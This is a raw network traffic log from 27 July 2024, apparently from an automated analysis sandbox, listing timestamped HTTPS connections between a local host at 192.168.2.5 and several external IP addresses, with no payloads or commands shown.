Jul 27, 2024 07:30:41.451005936 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.451066017 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.451630116 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.451688051 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.451755047 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.451807976 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.451867104 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.451932907 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.456645012 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.456728935 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.456736088 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.456752062 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.456790924 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.461119890 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.461194038 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.461215019 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.461245060 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.461297989 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.461312056 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.461386919 CEST	443	51842	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:41.461472034 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.486463070 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:41.736700058 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:41.736953020 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:41.737266064 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:41.741647005 CEST	51844	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:41.741662025 CEST	443	51844	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:42.364954948 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:42.365024090 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:42.365184069 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:42.385838032 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:42.385915041 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:42.386012077 CEST	51843	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:42.386032104 CEST	443	51843	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:42.502166033 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:42.502216101 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:42.502295971 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:42.502768993 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:42.502779007 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:42.967864990 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:42.967953920 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:42.968043089 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:42.968410969 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:42.968450069 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:43.112315893 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:43.112402916 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:43.115204096 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:43.115209103 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:43.115262985 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:43.115266085 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:43.115628958 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:43.115632057 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:43.115670919 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:43.115921974 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:43.115930080 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:43.467781067 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:43.467870951 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:43.469058990 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:43.469080925 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:43.469430923 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:43.472548008 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:43.472655058 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:43.472667933 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:43.869648933 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:43.869913101 CEST	443	51846	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:43.870239973 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:43.872005939 CEST	51846	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:44.343477964 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:44.343554020 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:44.343607903 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:44.370929956 CEST	51845	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:44.370944977 CEST	443	51845	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:44.487117052 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:44.487143040 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:44.488029957 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:44.488503933 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:44.488517046 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:45.137582064 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.137619019 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.137742043 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.138586044 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.138606071 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.162509918 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:45.162595034 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:45.165891886 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:45.165903091 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:45.165973902 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:45.165977001 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:45.166264057 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:45.166443110 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:45.166452885 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:45.619576931 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.619692087 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.620843887 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.620851040 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.621340990 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.623161077 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.623161077 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.623328924 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.623430014 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.623475075 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.623572111 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.623625994 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.623713017 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.623728037 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.623846054 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.623871088 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.623990059 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.624010086 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.634259939 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.634385109 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.634396076 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.634423018 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.634479046 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.634481907 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.634509087 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.634632111 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.634649992 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.634666920 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.634748936 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.634785891 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:45.639451027 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:45.640332937 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:46.017280102 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:46.017360926 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:46.017560005 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:46.033107996 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:46.033123016 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:46.033152103 CEST	51847	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:46.033158064 CEST	443	51847	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:46.142661095 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:46.142713070 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:46.142961025 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:46.143146992 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:46.143161058 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:46.768621922 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:46.768831015 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:46.771495104 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:46.771524906 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:46.771583080 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:46.771595001 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:46.771991014 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:46.772218943 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:46.772248983 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:47.614268064 CEST	51842	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:47.637365103 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:47.637392044 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:47.637540102 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:47.637888908 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:47.637898922 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.028985023 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:48.029078007 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:48.029133081 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:48.074464083 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:48.074512005 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:48.074542046 CEST	51849	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:48.074558020 CEST	443	51849	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:48.189690113 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.189748049 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:48.189840078 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.190393925 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.190426111 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:48.398637056 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:48.398751020 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:48.398825884 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:48.399198055 CEST	51848	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:48.399219036 CEST	443	51848	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:48.400913000 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.402481079 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.402492046 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.420329094 CEST	51852	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:48.420404911 CEST	443	51852	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:48.420523882 CEST	51852	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:48.421251059 CEST	51852	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:48.421283960 CEST	443	51852	188.114.96.3	192.168.2.5
Jul 27, 2024 07:30:48.719655037 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.719733000 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.719841957 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.719862938 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.724395990 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.724473000 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.724487066 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.724535942 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.730055094 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.730278015 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.763362885 CEST	51852	443	192.168.2.5	188.114.96.3
Jul 27, 2024 07:30:48.812057972 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.812112093 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.812160015 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.812180042 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.812210083 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.812227964 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.812259912 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.812290907 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.813154936 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.813234091 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.816698074 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.816802979 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.822204113 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.822294950 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.832201004 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.832261086 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.837502956 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.837646008 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.868335009 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.868472099 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.904071093 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.904114008 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.904179096 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.904179096 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.904191017 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.904350996 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.904514074 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.904587030 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.905483007 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.905565023 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.906044960 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.906111956 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.906160116 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.906979084 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.907012939 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.907095909 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.909271955 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.909358025 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.914614916 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.914685965 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.919800043 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.919910908 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.919923067 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.919929028 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.920006037 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.924745083 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.924813986 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.924832106 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.924885988 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.930190086 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.930243015 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.931353092 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.931761026 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.960876942 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.960951090 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.970223904 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.984642982 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:48.984766960 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.987674952 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.987699032 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:48.988234997 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.988246918 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:48.988792896 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.988804102 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:48.988883972 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:48.989593983 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:48.996539116 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.996678114 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.996778965 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.996869087 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.996879101 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.996886969 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.996922970 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.996922970 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.997132063 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.997215033 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.997253895 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.997263908 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.997339964 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.997339964 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.997787952 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.997872114 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.998147964 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.998195887 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.998219967 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.998228073 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:48.998274088 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:48.998275042 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.001724005 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.001832008 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.001946926 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.002043962 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.002162933 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.002168894 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.002209902 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.007153034 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.007227898 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.007241964 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.007247925 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.007364988 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.007366896 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.007473946 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.007481098 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.008194923 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.012471914 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.012533903 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.012634039 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.012686968 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.012701988 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.012835979 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.017379045 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.017491102 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.017535925 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.017535925 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.017544031 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.017595053 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.017807961 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.017815113 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.017857075 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.022737980 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.022793055 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.022855997 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.022911072 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.023829937 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.024030924 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.036498070 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:49.053596973 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.053643942 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.053689957 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.053689957 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.053699017 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090128899 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090208054 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090236902 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090244055 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090267897 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090270996 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090342045 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090374947 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090382099 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090408087 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090446949 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090446949 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090456009 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090487957 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090534925 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090534925 CEST	51850	443	192.168.2.5	31.14.70.245
